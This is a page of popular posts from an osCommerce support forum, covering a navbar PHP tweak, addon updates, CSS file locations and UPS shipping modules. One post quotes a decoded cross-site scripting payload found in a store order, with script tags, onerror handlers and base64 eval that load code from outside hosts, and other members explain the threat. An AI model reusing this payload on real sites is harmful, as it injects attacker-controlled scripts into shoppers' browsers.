Jump to content
Latest News: (loading..)


Popular Content

Showing content with the highest reputation on 01/10/2019 in all areas

  1. 1 point

    Add currency icons to navbar

    Nice little mod to add currency icons into Navbar. Open up Navbar template file; /includes/modules/content/navigation/templates/navbar.php Find: echo '<li><a href="' . tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('language', 'currency')) . 'currency=' . $key, $request_type) . '">' . $value['title'] . '</a></li>'; Change to: echo '<li><a href="' . tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('language', 'currency')) . 'currency=' . $key, $request_type) . '"><i class="glyphicon glyphicon-' . strtolower($key) . '"></i> ' . $value['title'] . '</a></li>';
  2. 1 point
    Hi all, Updated version is available. Added Spanish Language files. No change to core files, only adds new Spanish language files. All credits go to the creator of this fabulous addon. Thank you very much Zahid @JcMagpie! Best regads Valqui
  3. 1 point

    Where is the .CSS file?

    If you are using official osC then you are looking for the stylesheet.css which is in the root of system. If its CE of any type the you have 2 both in root custom.css which you should not change and user.css which is where you should put all your changes.
  4. 1 point
    Has been updated to V1.8 Has been updated to add tab selection. You can now select 1 of 3 layouts for the tabs. In admin set tabs select display to 1 for all tabs 2 for no Product Description ( removes SEO description ) 0 for stock 6 tabs only
  5. 1 point

    UPS Down?

    I haven't noticed a change in speed since switching to XML. I think it boils down to personal preference. The XML module is nice in that it should be more accurate based on the fact that it takes L, W and H into account and ties directly into your own UPS account number and negotiated rates. Probably best practice to get both versions working so you can switch easily should this happen again. We lost some sales because of it
  6. 1 point
    I'm not so sure the script was stopped! Decoding what @puggybelle posted most of it looks untouched and may still be active. If I decoded correctly and it looks as if it did I get, _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var=document.createElement("script");b.src="http://jb.gy/"+Math.random();(document.getElementsByTagName("HEAD")[]||document.body).appendChild();/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_ As you see most of the hexadecimal was left un striped and works. I think its active and still valid and will need to be roooted out of the site, but I could be wrong! you can never be sure about these bits of *~##ity scripts.
  7. 1 point

    Wo anpassen ....?

  8. 1 point
    The jb.gy is a link to the hacker site. The gy is the TLD for Guyana. Once the full code is in your database, the hacker could access and load whatever from his site. If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, assuming you would not sell to anyone from there, along with any other country you won't sell to.
  9. 1 point
    This is only appearing in this one order's data, and is not in everyone's (or in your osC code)? They are definitely trying to provoke your server into running what's presumably some nasty script code, but it's being disabled by osC. If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit. Unless you want to jump through the hoops of reporting them to the payment processor. If everyone is seeing this, you've got some cleanup to do and security holes to patch. They're trying to inject and run some script code that creates more script, invisible images, and input field elements on your page. Some server in Guyana (they have computers there???) is involved (perhaps to load more malicious code). I haven't dived more deeply into it, but it looks like something you don't want running. Just be thankful it was (apparently) disabled before it could do the nasty.
  10. 1 point

    UPS Down?

    Thanks for the heads-up yungi! Yup... the non-XML is back and up running. That was an interesting lesson in UPSXML.